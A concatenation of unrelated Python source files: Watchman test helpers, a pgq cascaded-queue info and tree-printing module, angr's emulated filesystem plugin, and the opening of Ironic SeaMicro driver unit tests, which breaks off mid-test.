if not self.fileListContains(list1, list2):
message = "list1 %r should contain %r: %s" % (list1, list2, message)
self.fail(message)
# Wait for the file list to match the input set
def assertFileList(
self, root, files=None, cursor=None, relativeRoot=None, message=None
):
expected_files = files or []
if (cursor is not None) and cursor[0:2] == "n:":
# it doesn't make sense to repeat named cursor queries, as
# the cursor moves each time
self.getFileList(root, cursor=cursor, relativeRoot=relativeRoot)
else:
st, res = self.waitFor(
lambda: self.fileListsEqual(
self.getFileList(root, cursor=cursor, relativeRoot=relativeRoot),
expected_files,
)
)
self.assertFileListsEqual(self.last_file_list, expected_files, message)
# Wait for the list of watched roots to match the input set
def assertWatchListContains(self, roots, message=None):
st, res = self.waitFor(
lambda: self.fileListContains(self.getWatchList(), roots)
)
self.assertFileListContains(self.last_root_list, roots, message)
def waitForSub(self, name, root, accept=None, timeout=10, remove=True):
client = self.getClient()
def default_accept(dat):
return True
if accept is None:
accept = default_accept
deadline = time.time() + timeout
while time.time() < deadline:
Interrupt.checkInterrupt()
sub = self.getSubscription(name, root=root, remove=False)
if sub is not None:
res = accept(sub)
if res:
return self.getSubscription(name, root=root, remove=remove)
# wait for more data
client.setTimeout(deadline - time.time())
client.receive()
return None
def getSubscription(self, name, root, remove=True, normalize=True):
data = self.getClient().getSubscription(name, root=root, remove=remove)
if data is None or not normalize:
return data
def norm_sub_item(item):
if isinstance(item, STRING_TYPES):
return norm_relative_path(item)
item["name"] = norm_relative_path(item["name"])
return item
def norm_sub(sub):
if "files" in sub:
files = []
for item in sub["files"]:
files.append(norm_sub_item(item))
sub["files"] = files
return sub
return list(map(norm_sub, data))
def isCaseInsensitive(self):
if hasattr(self, "_case_insensitive"):
return self._case_insensitive
d = self.mkdtemp()
self.touchRelative(d, "a")
self._case_insensitive = os.path.exists(os.path.join(d, "A"))
return self._case_insensitive
def suspendWatchman(self):
WatchmanInstance.getSharedInstance().suspend()
def resumeWatchman(self):
WatchmanInstance.getSharedInstance().resume()
def rootIsWatched(self, r):
r = norm_absolute_path(r)
watches = [
norm_absolute_path(root)
for root in self.watchmanCommand("watch-list")["roots"]
]
return r in watches
def skip_for(transports=None, codecs=None):
"""
Decorator to allow skipping tests for particular transports or codecs."""
transports = set(transports or ())
codecs = set(codecs or ())
def skip(f):
@functools.wraps(f)
def wrapper(self, *args, **kwargs):
if self.transport in transports or self.encoding in codecs:
self.skipTest(
"test skipped for transport %s, codec %s"
% (self.transport, self.encoding)
)
return f(self, *args, **kwargs)
return wrapper
return skip
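# Example usage (illustrative):
#
#   class MyTest(WatchmanTestCase):
#       @skip_for(transports={"cli"}, codecs={"json"})
#       def test_something(self):
#           pass  # only runs for transport/codec pairs not listed above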
def expand_matrix(test_class):
"""
A decorator function used to create different permutations from
a given input test class.
Given a test class named "MyTest", this will create 4 separate
classes named "MyTestLocalBser", "MyTestLocalBser2",
"MyTestLocalJson" and "MyTestCliJson" that will exercise the
different transport and encoding options implied by their names.
"""
matrix = [
("local", "bser", "LocalBser2"),
("local", "json", "LocalJson"),
("cli", "json", "CliJson"),
]
if not pywatchman.compat.PYTHON3:
matrix += [("local", "bser-v1", "LocalBser")]
# We do some rather hacky things here to define new test class types
# in our caller's scope. This is needed so that the unittest TestLoader
# will find the subclasses we define.
caller_scope = inspect.currentframe().f_back.f_locals
for (transport, encoding, suffix) in matrix:
def make_class(transport, encoding, suffix):
subclass_name = test_class.__name__ + suffix
# Define a new class that derives from the input class
class MatrixTest(test_class):
def setDefaultConfiguration(self):
self.setConfiguration(transport, encoding)
# Set the name and module information on our new subclass
MatrixTest.__name__ = subclass_name
MatrixTest.__qualname__ = subclass_name
MatrixTest.__module__ = test_class.__module__
# Before we publish the test, check whether that generated
# configuration would always skip
try:
t = MatrixTest()
t.checkPersistentSession()
t.checkOSApplicability()
caller_scope[subclass_name] = MatrixTest
except unittest.SkipTest:
pass
make_class(transport, encoding, suffix)
return None
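# Example usage (illustrative): decorating a test class in a test module
#
#   @expand_matrix
#   class MyTest(WatchmanTestCase):
#       def test_foo(self):
#           self.assertTrue(True)
#
# afterwards MyTestLocalBser2, MyTestLocalJson and MyTestCliJson (plus
# MyTestLocalBser on Python 2) exist in the module for the TestLoader.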
|
|
#! /usr/bin/env python
"""Info about node/set/members. For admin tool.
"""
__all__ = ['MemberInfo', 'NodeInfo', 'QueueInfo']
# node types
ROOT = 'root'
BRANCH = 'branch'
LEAF = 'leaf'
class MemberInfo:
"""Info about set member."""
def __init__(self, row):
self.name = row['node_name']
self.location = row['node_location']
self.dead = row['dead']
class NodeInfo:
"""Detailed info about set node."""
name = None
type = None
global_watermark = None
local_watermark = None
completed_tick = None
provider_node = None
provider_location = None
consumer_name = None #?
worker_name = None #?
paused = False
uptodate = True
combined_queue = None
combined_type = None
def __init__(self, queue_name, row, main_worker = True, node_name = None):
self.queue_name = queue_name
self.member_map = {}
self.main_worker = main_worker
self.parent = None
self.consumer_map = {}
self.queue_info = {}
self._info_lines = []
self.cascaded_consumer_map = {}
self._row = row
if not row:
self.name = node_name
self.type = 'dead'
return
self.name = row['node_name']
self.type = row['node_type']
self.global_watermark = row['global_watermark']
self.local_watermark = row['local_watermark']
self.completed_tick = row['worker_last_tick']
self.provider_node = row['provider_node']
self.provider_location = row['provider_location']
self.consumer_name = row['worker_name']
self.worker_name = row['worker_name']
self.paused = row['worker_paused']
self.uptodate = row['worker_uptodate']
self.combined_queue = row['combined_queue']
self.combined_type = row['combined_type']
def __get_target_queue(self):
qname = None
if self.type == LEAF:
if self.combined_queue:
qname = self.combined_queue
else:
return None
else:
qname = self.queue_name
if qname is None:
raise Exception("no target queue")
return qname
def get_title(self):
return "%s (%s)" % (self.name, self.type)
def get_infolines(self):
lst = self._info_lines
if self.parent:
root = self.parent
while root.parent:
root = root.parent
cinfo = self.parent.consumer_map.get(self.consumer_name)
if cinfo and root.queue_info:
tick_time = cinfo['tick_time']
root_time = root.queue_info['now']
lag = root_time - tick_time
else:
lag = "(n/a?)"
elif self.queue_info:
lag = self.queue_info['ticker_lag']
else:
lag = "(n/a)"
txt = "lag: %s" % lag
if self.paused:
txt += ", PAUSED"
if not self.uptodate:
txt += ", NOT UPTODATE"
lst.append(txt)
for cname, row in self.cascaded_consumer_map.items():
err = row['cur_error']
if err:
lst.append("ERR: %s: %s" % (cname, err))
return lst
def add_info_line(self, ln):
self._info_lines.append(ln)
def load_status(self, curs):
self.consumer_map = {}
self.queue_info = {}
self.cascaded_consumer_map = {}
if self.queue_name:
q = "select consumer_name, current_timestamp - lag as tick_time,"\
" lag, last_seen, last_tick "\
"from pgq.get_consumer_info(%s)"
curs.execute(q, [self.queue_name])
for row in curs.fetchall():
cname = row['consumer_name']
self.consumer_map[cname] = row
q = "select current_timestamp - ticker_lag as tick_time,"\
" ticker_lag, current_timestamp as now "\
"from pgq.get_queue_info(%s)"
curs.execute(q, [self.queue_name])
self.queue_info = curs.fetchone()
q = "select * from pgq_node.get_consumer_info(%s)"
curs.execute(q, [self.queue_name])
for row in curs.fetchall():
cname = row['consumer_name']
self.cascaded_consumer_map[cname] = row
class QueueInfo:
"""Info about cascaded queue.
Slightly broken, as all info is per-node.
"""
def __init__(self, queue_name, info_row, member_rows):
self.local_node = NodeInfo(queue_name, info_row)
self.queue_name = queue_name
self.member_map = {}
self.node_map = {}
self.add_node(self.local_node)
for r in member_rows:
n = MemberInfo(r)
self.member_map[n.name] = n
def get_member(self, name):
return self.member_map.get(name)
def get_node(self, name):
return self.node_map.get(name)
def add_node(self, node):
self.node_map[node.name] = node
def tag_dead(self, node_name):
if node_name in self.node_map:
self.member_map[node_name].dead = True
else:
row = {'node_name': node_name, 'node_location': None, 'dead': True}
m = MemberInfo(row)
self.member_map[node_name] = m
#
# Rest is about printing the tree
#
_DATAFMT = "%-30s%s"
def print_tree(self):
"""Print ascii-tree for set.
Expects that data for all nodes is filled in."""
root_list = self._prepare_tree()
for root in root_list:
self._tree_calc(root)
datalines = self._print_node(root, '', [])
for ln in datalines:
print(self._DATAFMT % (' ', ln))
def _print_node(self, node, pfx, datalines):
# print a tree fragment for node and info
# returns list of unprinted data rows
for ln in datalines:
print(self._DATAFMT % (_setpfx(pfx, '|'), ln))
datalines = node.get_infolines()
print("%s%s" % (_setpfx(pfx, '+--'), node.get_title()))
for i, n in enumerate(node.child_list):
sfx = ((i < len(node.child_list) - 1) and ' |' or ' ')
datalines = self._print_node(n, pfx + sfx, datalines)
return datalines
def _prepare_tree(self):
# reset vars, fill parent and child_list for each node
# returns list of root nodes (mostly 1)
for node in self.node_map.values():
node.total_childs = 0
node.levels = 0
node.child_list = []
node.parent = None
root_list = []
for node in self.node_map.values():
if node.provider_node \
and node.provider_node != node.name \
and node.provider_node in self.node_map:
p = self.node_map[node.provider_node]
p.child_list.append(node)
node.parent = p
else:
node.parent = None
root_list.append(node)
return root_list
def _tree_calc(self, node):
        # calculate levels and count total children,
        # then sort the tree based on them
total = len(node.child_list)
levels = 1
for subnode in node.child_list:
self._tree_calc(subnode)
total += subnode.total_childs
if levels < subnode.levels + 1:
levels = subnode.levels + 1
node.total_childs = total
node.levels = levels
node.child_list.sort(key = _node_key)
def _setpfx(pfx, sfx):
if pfx:
pfx = pfx[:-1] + sfx
return pfx
def _node_key(n):
return (n.levels, n.total_childs)
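# Example (a sketch with hand-built rows; in the admin tool these come from
# the pgq_node SQL functions):
#
#   info_row = {'node_name': 'rootnode', 'node_type': 'root',
#               'global_watermark': 1, 'local_watermark': 1,
#               'worker_last_tick': 1, 'provider_node': None,
#               'provider_location': None, 'worker_name': 'w',
#               'worker_paused': False, 'worker_uptodate': True,
#               'combined_queue': None, 'combined_type': None}
#   members = [{'node_name': 'rootnode', 'node_location': 'db=a', 'dead': False}]
#   QueueInfo('myqueue', info_row, members).print_tree()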
|
|
import os
import logging
from .plugin import SimStatePlugin
from ..storage.file import SimFile
from ..errors import SimMergeError
from ..misc.ux import once
l = logging.getLogger(name=__name__)
class SimFilesystem(SimStatePlugin): # pretends links don't exist
"""
angr's emulated filesystem. Available as state.fs.
When constructing, all parameters are optional.
:param files: A mapping from filepath to SimFile
:param pathsep: The character used to separate path elements, default forward slash.
:param cwd: The path of the current working directory to use
:param mountpoints: A mapping from filepath to SimMountpoint
:ivar pathsep: The current pathsep
:ivar cwd: The current working directory
:ivar unlinks: A list of unlink operations, tuples of filename and simfile. Be careful, this list is
shallow-copied from successor to successor, so don't mutate anything in it without copying.
"""
def __init__(self, files=None, pathsep=None, cwd=None, mountpoints=None):
super().__init__()
if files is None: files = {}
if pathsep is None: pathsep = b'/'
if cwd is None: cwd = pathsep
if mountpoints is None: mountpoints = {}
self.pathsep = pathsep
self.cwd = cwd
self._unlinks = []
self._files = {}
self._mountpoints = {}
for fname in mountpoints:
self.mount(fname, mountpoints[fname])
for fname in files:
self.insert(fname, files[fname])
@property
def unlinks(self):
for _, f in self._unlinks:
f.set_state(self.state)
return self._unlinks
def set_state(self, state):
super().set_state(state)
for fname in self._files:
self._files[fname].set_state(state)
for fname in self._mountpoints:
self._mountpoints[fname].set_state(state)
@SimStatePlugin.memo
def copy(self, memo):
o = SimFilesystem(
files={k: v.copy(memo) for k, v in self._files.items()},
pathsep=self.pathsep,
cwd=self.cwd,
mountpoints={k: v.copy(memo) for k, v in self._mountpoints.items()}
)
o._unlinks = list(self._unlinks)
return o
def merge(self, others, merge_conditions, common_ancestor=None):
merging_occured = False
for o in others:
if o.cwd != self.cwd:
raise SimMergeError("Can't merge filesystems with disparate cwds")
if len(o._mountpoints) != len(self._mountpoints):
raise SimMergeError("Can't merge filesystems with disparate mountpoints")
if list(map(id, o.unlinks)) != list(map(id, self.unlinks)):
raise SimMergeError("Can't merge filesystems with disparate unlinks")
for fname in self._mountpoints:
try:
subdeck = [o._mountpoints[fname] for o in others]
except KeyError:
raise SimMergeError("Can't merge filesystems with disparate file sets")
if common_ancestor is not None and fname in common_ancestor._mountpoints:
common_mp = common_ancestor._mountpoints[fname]
else:
common_mp = None
merging_occured |= self._mountpoints[fname].merge(subdeck, merge_conditions, common_ancestor=common_mp)
# this is a little messy
deck = [self] + others
all_files = set.union(*(set(o._files.keys()) for o in deck))
for fname in all_files:
subdeck = [o._files[fname] if fname in o._files else None for o in deck]
representative = next(x for x in subdeck if x is not None)
for i, v in enumerate(subdeck):
if v is None:
                    # states missing this file get a copy of the representative
                    subdeck[i] = representative.copy()
if i == 0:
self._files[fname] = subdeck[i]
if common_ancestor is not None and fname in common_ancestor._files:
common_simfile = common_ancestor._files[fname]
else:
common_simfile = None
merging_occured |= subdeck[0].merge(subdeck[1:], merge_conditions, common_ancestor=common_simfile)
return merging_occured
def widen(self, others): # pylint: disable=unused-argument
if once('fs_widen_warning'):
l.warning("Filesystems can't be widened yet - beware unsoundness")
def _normalize_path(self, path):
"""
Takes a path and returns a simple absolute path as a list of directories from the root
"""
if type(path) is str:
path = path.encode()
path = path.split(b'\0')[0]
if path[0:1] != self.pathsep:
path = self.cwd + self.pathsep + path
keys = path.split(self.pathsep)
i = 0
while i < len(keys):
if keys[i] == b'':
keys.pop(i)
elif keys[i] == b'.':
keys.pop(i)
elif keys[i] == b'..':
keys.pop(i)
if i != 0:
keys.pop(i-1)
i -= 1
else:
i += 1
return keys
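    # e.g. with pathsep=b'/' and cwd=b'/tmp', _normalize_path(b'a/./b/../c')
    # returns [b'tmp', b'a', b'c'] -- relative paths are anchored at the cwd
    # and '.'/'..' components are resolved lexically.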
def _join_chunks(self, keys):
"""
Takes a list of directories from the root and joins them into a string path
"""
return self.pathsep + self.pathsep.join(keys)
def chdir(self, path):
"""
Changes the current directory to the given path
"""
self.cwd = self._join_chunks(self._normalize_path(path))
def get(self, path):
"""
Get a file from the filesystem. Returns a SimFile or None.
"""
mountpoint, chunks = self.get_mountpoint(path)
if mountpoint is None:
return self._files.get(self._join_chunks(chunks))
else:
return mountpoint.get(chunks)
def insert(self, path, simfile):
"""
Insert a file into the filesystem. Returns whether the operation was successful.
"""
if self.state is not None:
simfile.set_state(self.state)
mountpoint, chunks = self.get_mountpoint(path)
if mountpoint is None:
self._files[self._join_chunks(chunks)] = simfile
return True
else:
return mountpoint.insert(chunks, simfile)
def delete(self, path):
"""
Remove a file from the filesystem. Returns whether the operation was successful.
This will add a ``fs_unlink`` event with the path of the file and also the index into the `unlinks` list.
"""
mountpoint, chunks = self.get_mountpoint(path)
apath = self._join_chunks(chunks)
if mountpoint is None:
try:
simfile = self._files.pop(apath)
except KeyError:
return False
else:
self.state.history.add_event('fs_unlink', path=apath, unlink_idx=len(self.unlinks))
self.unlinks.append((apath, simfile))
return True
else:
return mountpoint.delete(chunks)
def mount(self, path, mount):
"""
Add a mountpoint to the filesystem.
"""
self._mountpoints[self._join_chunks(self._normalize_path(path))] = mount
def unmount(self, path):
"""
Remove a mountpoint from the filesystem.
"""
del self._mountpoints[self._join_chunks(self._normalize_path(path))]
def get_mountpoint(self, path):
"""
Look up the mountpoint servicing the given path.
:return: A tuple of the mount and a list of path elements traversing from the mountpoint to the specified file.
"""
path_chunks = self._normalize_path(path)
for i in range(len(path_chunks) - 1, -1, -1):
partial_path = self._join_chunks(path_chunks[:-i])
if partial_path in self._mountpoints:
mountpoint = self._mountpoints[partial_path]
if mountpoint is None:
break
return mountpoint, path_chunks[-i:]
return None, path_chunks
SimFilesystem.register_default('fs')
class SimMount(SimStatePlugin):
"""
This is the base class for "mount points" in angr's simulated filesystem. Subclass this class and
give it to the filesystem to intercept all file creations and opens below the mountpoint.
Since this a SimStatePlugin you may also want to implement set_state, copy, merge, etc.
"""
def get(self, path_elements):
"""
Implement this function to instrument file lookups.
:param path_elements: A list of path elements traversing from the mountpoint to the file
:return: A SimFile, or None
"""
raise NotImplementedError
def insert(self, path_elements, simfile):
"""
Implement this function to instrument file creation.
:param path_elements: A list of path elements traversing from the mountpoint to the file
:param simfile: The file to insert
:return: A bool indicating whether the insert occurred
"""
raise NotImplementedError
def delete(self, path_elements):
"""
Implement this function to instrument file deletion.
:param path_elements: A list of path elements traversing from the mountpoint to the file
:return: A bool indicating whether the delete occurred
"""
raise NotImplementedError
class SimConcreteFilesystem(SimMount):
"""
Abstract SimMount allowing the user to import files from some external source into the guest
:param str pathsep: The host path separator character, default os.path.sep
"""
def __init__(self, pathsep=os.path.sep):
super().__init__()
self.pathsep = pathsep
self.cache = {}
self.deleted_list = set()
def get(self, path_elements):
path = self.pathsep.join(x.decode() for x in path_elements)
if path in self.deleted_list:
return None
if path not in self.cache:
simfile = self._load_file(path)
if simfile is None:
return None
self.insert(path_elements, simfile)
return self.cache[path]
def _load_file(self, guest_path):
raise NotImplementedError
def insert(self, path_elements, simfile):
path = self.pathsep.join(x.decode() for x in path_elements)
simfile.set_state(self.state)
self.cache[path] = simfile
self.deleted_list.discard(path)
return True
def delete(self, path_elements):
path = self.pathsep.join(x.decode() for x in path_elements)
self.deleted_list.add(path)
return self.cache.pop(path, None) is not None
@SimStatePlugin.memo
def copy(self, memo):
x = type(self)(pathsep=self.pathsep)
x.cache = {fname: self.cache[fname].copy(memo) for fname in self.cache}
x.deleted_list = set(self.deleted_list)
return x
def set_state(self, state):
super().set_state(state)
for fname in self.cache:
self.cache[fname].set_state(state)
def merge(self, others, merge_conditions, common_ancestor=None):
merging_occured = False
for o in others:
if o.pathsep != self.pathsep:
raise SimMergeError("Can't merge concrete filesystems with disparate pathseps")
if o.deleted_list != self.deleted_list:
raise SimMergeError("Can't merge concrete filesystems with disparate deleted files")
deck = [self] + others
        all_files = set.union(*(set(o.cache.keys()) for o in deck))
for fname in all_files:
subdeck = []
basecase = None
for o in deck:
try:
subdeck.append(o.cache[fname])
except KeyError:
if basecase is None:
basecase = self._load_file(fname)
subdeck.append(basecase)
if common_ancestor is not None and fname in common_ancestor.cache:
common_simfile = common_ancestor.cache[fname]
else:
common_simfile = None
merging_occured |= subdeck[0].merge(subdeck[1:], merge_conditions, common_ancestor=common_simfile)
return merging_occured
def widen(self, others): # pylint: disable=unused-argument
if once('host_fs_widen_warning'):
l.warning("The host filesystem mount can't be widened yet - beware unsoundness")
class SimHostFilesystem(SimConcreteFilesystem):
"""
Simulated mount that makes some piece from the host filesystem available to the guest.
:param str host_path: The path on the host to mount
:param str pathsep: The host path separator character, default os.path.sep
"""
def __init__(self, host_path=None, **kwargs):
super().__init__(**kwargs)
self.host_path = host_path if host_path is not None else self.pathsep
@SimStatePlugin.memo
def copy(self, memo):
o = super().copy(memo)
o.host_path = self.host_path
return o
def _load_file(self, guest_path):
path = os.path.join(self.host_path, guest_path)
try:
with open(path, 'rb') as fp:
content = fp.read()
except OSError:
return None
else:
return SimFile(name='file://' + path, content=content, size=len(content))
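# Example usage (a sketch; assumes an angr SimState `state` already exists):
#   state.fs.mount(b'/host', SimHostFilesystem('/tmp/guest_root'))
#   f = state.fs.get(b'/host/etc/motd')   # lazily imported from the host fs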
#class SimDirectory(SimStatePlugin):
# """
# This is the base class for directories in angr's emulated filesystem. An instance of this class or a subclass will
# be found as ``state.fs``, representing the root of the filesystem.
#
# :ivar files: A mapping from filename to file that this directory contains.
# """
# def __init__(self, files=None, writable=True, parent=None, pathsep='/'):
# super(SimDirectory, self).__init__()
# self.files = files
# self.writable = writable
# self.parent = parent if parent is not None else self
# self.pathsep = pathsep
# self.files['.'] = self
# self.files['..'] = self.parent
#
# def __len__(self):
# return len(self.files)
#
# def lookup(self, path, writing=False):
# """
# Look up the file or directory at the end of the given path.
# This method should be called on the current working directory object.
#
# :param str path: The path to look up
# :param bool writing: Whether the operation desired requires write permissions
# :returns: The SimDirectory or SimFile object specified, or None if not found, or False if writing
# was requested and the target is nonwritable
# """
# if len(path) == 0:
# return None
# if path[0] == self.pathsep:
# # lookup the filesystem root
# root = self
# while root.parent is not root:
# root = root.parent
# return root._lookup(path[1:], writing)
# else:
# return self._lookup(path, writing)
#
# def _lookup(self, path, writing):
# while path.startswith(self.pathsep):
# path = path[1:]
#
# if len(path) == 0:
# if writing and not self.writable:
# return False
# return self
#
# for fname, simfile in self.files.items():
# if path.startswith(fname):
# if len(path) == len(fname):
# if writing and not simfile.writable:
# return False
# return simfile
# elif path[len(fname)] == self.pathsep:
# if isinstance(simfile, SimDirectory):
# return simfile._lookup(path[len(fname)+1:])
# else: # TODO: symlinks
# return None
#
# return None
#
# def insert(self, path, simfile):
# """
# Add a file to the filesystem.
# This method should be called on the current working directory object.
#
# :param str path: The path to insert the new file at
# :param simfile: The new file or directory
# :returns: A boolean indicating whether the operation succeeded
# """
# while len(path) > 1 and path[-1] == self.pathsep:
# path = path[:-1]
#
# if self.pathsep not in path:
# if path in self.files:
# return False
# if isinstance(simfile, SimDirectory):
# if simfile.parent is simfile:
# simfile.parent = self
# simfile.pathsep = self.pathsep
# else:
# l.error("Trying to add directory to filesystem which already has a parent")
#
# self.files[path] = simfile
# simfile.set_state(self.state)
# return True
# else:
# lastsep = path.rindex(self.pathsep) + 1
# head, tail = path[:lastsep], path[lastsep:]
# parent = self.lookup(head, True)
#
# if not parent:
# return False
# return parent.insert(tail, simfile)
#
# def remove(self, path):
# """
# Remove a file from the filesystem. If the target is a directory, the directory must be empty.
# This method should be called on the current working directory object.
#
# :param str path: The path to remove the file at
# :returns: A boolean indicating whether the operation succeeded
# """
# while len(path) > 1 and path[-1] == self.pathsep:
# # TODO: when symlinks exist this will need to be fixed to delete the target of the
# # symlink instead of the link itself
# path = path[:-1]
#
# if self.pathsep not in path:
# if path in ('.', '..'):
# return False
# if path not in self.files:
# return False
# if isinstance(self.files[path], SimDirectory) and len(self.files[path]) != 2:
# return False
#
# del self.files[path]
# return True
# else:
# lastsep = path.rindex(self.pathsep) + 1
# head, tail = path[:lastsep], path[lastsep:]
# parent = self.lookup(head, True)
#
# if not parent:
# return False
# return parent.remove(tail)
#
# @SimStatePlugin.memo
# def copy(self, memo):
# return SimDirectory(
# files={x: y.copy(memo) for x, y in self.files.items()},
# writable=self.writable,
# parent=self.parent.copy(memo),
# pathsep=self.pathsep)
#
# def merge(self, others, conditions, ancestor=None):
# new_files = {path: (simfile, [], []) for path, simfile in self.files.items() if path not in ('.', '..')}
# for other, condition in zip(others, conditions):
# if type(other) is not type(self):
# raise SimMergeError("Can't merge filesystem elements of disparate types")
# for path, simfile in other.files.items():
# if path in ('.', '..'):
# continue
# if path not in new_files:
# l.warning("Cannot represent the conditional creation of files")
# new_files[path] = (simfile, [], [])
# else:
# new_files[path][1].append(simfile)
# new_files[path][2].append(condition)
#
# for k in new_files:
# new_files[k][0].merge(new_files[k][1], new_files[k][2], ancestor)
# new_files[k] = new_files[k][0]
# new_files['.'] = self
# new_files['..'] = self.parent
# self.files = new_files
#
# def widen(self, others):
# new_files = {path: [simfile] for path, simfile in self.files.items() if path not in ('.', '..')}
# for other in others:
# if type(other) is not type(self):
# raise SimMergeError("Can't merge filesystem elements of disparate types")
# for path, simfile in other.files.items():
# if path in ('.', '..'):
# continue
# if path not in new_files:
# new_files[path] = [simfile]
# else:
# new_files[path].append(simfile)
#
# for k in new_files:
# new_files[k][0].widen(new_files[k][1:])
# new_files[k] = new_files[k][0]
# new_files['.'] = self
# new_files['..'] = self.parent
# self.files = new_files
#
#class SimDirectoryConcrete(SimDirectory):
# """
# A SimDirectory that forwards its requests to the host filesystem
#
# :param host_path: The path on the host filesystem to provide
# :param writable: Whether to allow mutation of the host filesystem by the guest
# """
# def __init__(self, host_path, writable=False, pathsep='/', host_root=None, parent=None):
#        super(SimDirectoryConcrete, self).__init__(files={}, writable=writable, parent=parent, pathsep=pathsep)
# self.host_path = os.path.realpath(host_path)
# self.host_root = self.host_path if host_root is None else host_root
#
# def _lookup(self, path, writing):
# partial_path = self.host_path
# for i, pathkey in enumerate(path.split(self.pathsep)):
# if partial_path == self.host_root and pathkey == '..':
# target = self.pathsep.join(path.split(self.pathsep)[i+1:])
# return self.parent._lookup(target, writing)
# if not os.path.isdir(partial_path):
# return None
#
# partial_path = os.path.realpath(partial_path + self.pathsep + pathkey)
#
# if writing and not self.writable:
# return False
#
# if os.path.isdir(partial_path):
# f = SimDirectoryConcrete(host_path=partial_path, writable=self.writable, host_root=self.host_root, parent=self.parent)
# f.set_state(self.state)
# return f
# elif os.path.isfile(partial_path):
# try:
# f = SimFileConcrete(host_path=partial_path, writable=self.writable)
# f.set_state(self.state)
# return f
# except OSError:
# return None
# else:
# raise SimFilesystemError("Can't handle something other than a file or directory in a concrete filesystem")
#
# def insert(self, path, simfile):
# if self.pathsep in path:
# return super(SimDirectoryConcrete, self).insert(path, simfile)
# else:
# fullpath = os.path.join(self.host_path, path)
# if os.path.exists(fullpath):
# return False
# with open(fullpath, 'w') as fp:
# fp.write(simfile.concretize())
# return True
#
# def remove(self, path):
# if self.pathsep in path:
# return super(SimDirectoryConcrete, self).remove(path)
# else:
# fullpath = os.path.join(self.host_path, path)
# if not os.path.exists(fullpath):
# return False
# if os.path.isdir(fullpath):
# try:
# os.rmdir(fullpath)
# except OSError:
# return False
# return True
# elif os.path.isfile(fullpath):
# try:
# os.unlink(fullpath)
# except OSError:
# return False
# return True
# else:
# raise SimFilesystemError("Can't handle anything but files and directories in concrete filesystem")
#
#SimDirectory.register_default('fs')
|
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for Ironic SeaMicro driver."""
import uuid
import mock
from seamicroclient import client as seamicro_client
from seamicroclient import exceptions as seamicro_client_exception
from ironic.common import boot_devices
from ironic.common import driver_factory
from ironic.common import exception
from ironic.common import states
from ironic.common import utils
from ironic.conductor import task_manager
from ironic.drivers.modules import seamicro
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base as db_base
from ironic.tests.db import utils as db_utils
from ironic.tests.objects import utils as obj_utils
INFO_DICT = db_utils.get_test_seamicro_info()
class Fake_Server():
def __init__(self, active=False, *args, **kwargs):
self.active = active
self.nic = {'0': {'untaggedVlan': ''}}
def power_on(self):
self.active = True
def power_off(self, force=False):
self.active = False
def reset(self):
self.active = True
def set_untagged_vlan(self, vlan_id):
return
def attach_volume(self, volume_id):
return
def detach_volume(self):
return
def set_boot_order(self, boot_order):
return
def refresh(self, wait=0):
return self
class Fake_Volume():
def __init__(self, id=None, *args, **kwargs):
if id is None:
self.id = "%s/%s/%s" % ("0", "ironic-p6-6", str(uuid.uuid4()))
else:
self.id = id
class Fake_Pool():
def __init__(self, freeSize=None, *args, **kwargs):
self.freeSize = freeSize
class SeaMicroValidateParametersTestCase(db_base.DbTestCase):
def test__parse_driver_info_good(self):
# make sure we get back the expected things
node = obj_utils.get_test_node(
self.context,
driver='fake_seamicro',
driver_info=INFO_DICT)
info = seamicro._parse_driver_info(node)
self.assertIsNotNone(info.get('api_endpoint'))
self.assertIsNotNone(info.get('username'))
self.assertIsNotNone(info.get('password'))
self.assertIsNotNone(info.get('server_id'))
self.assertIsNotNone(info.get('uuid'))
def test__parse_driver_info_missing_api_endpoint(self):
# make sure error is raised when info is missing
info = dict(INFO_DICT)
del info['seamicro_api_endpoint']
node = obj_utils.get_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
seamicro._parse_driver_info,
node)
def test__parse_driver_info_missing_username(self):
# make sure error is raised when info is missing
info = dict(INFO_DICT)
del info['seamicro_username']
node = obj_utils.get_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
seamicro._parse_driver_info,
node)
def test__parse_driver_info_missing_password(self):
# make sure error is raised when info is missing
info = dict(INFO_DICT)
del info['seamicro_password']
node = obj_utils.get_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
seamicro._parse_driver_info,
node)
def test__parse_driver_info_missing_server_id(self):
# make sure error is raised when info is missing
info = dict(INFO_DICT)
del info['seamicro_server_id']
node = obj_utils.get_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
seamicro._parse_driver_info,
node)
class SeaMicroPrivateMethodsTestCase(db_base.DbTestCase):
def setUp(self):
super(SeaMicroPrivateMethodsTestCase, self).setUp()
n = {
'driver': 'fake_seamicro',
'driver_info': INFO_DICT
}
self.node = obj_utils.create_test_node(self.context, **n)
self.Server = Fake_Server
self.Volume = Fake_Volume
self.Pool = Fake_Pool
self.config(action_timeout=0, group='seamicro')
self.config(max_retry=2, group='seamicro')
self.patcher = mock.patch('eventlet.greenthread.sleep')
self.mock_sleep = self.patcher.start()
@mock.patch.object(seamicro_client, "Client")
def test__get_client(self, mock_client):
driver_info = seamicro._parse_driver_info(self.node)
args = {'username': driver_info['username'],
'password': driver_info['password'],
'auth_url': driver_info['api_endpoint']}
seamicro._get_client(**driver_info)
mock_client.assert_called_once_with(driver_info['api_version'], **args)
@mock.patch.object(seamicro_client, "Client")
def test__get_client_fail(self, mock_client):
driver_info = seamicro._parse_driver_info(self.node)
args = {'username': driver_info['username'],
'password': driver_info['password'],
'auth_url': driver_info['api_endpoint']}
mock_client.side_effect = seamicro_client_exception.UnsupportedVersion
self.assertRaises(exception.InvalidParameterValue,
seamicro._get_client,
**driver_info)
mock_client.assert_called_once_with(driver_info['api_version'], **args)
@mock.patch.object(seamicro, "_get_server")
def test__get_power_status_on(self, mock_get_server):
mock_get_server.return_value = self.Server(active=True)
pstate = seamicro._get_power_status(self.node)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch.object(seamicro, "_get_server")
def test__get_power_status_off(self, mock_get_server):
mock_get_server.return_value = self.Server(active=False)
pstate = seamicro._get_power_status(self.node)
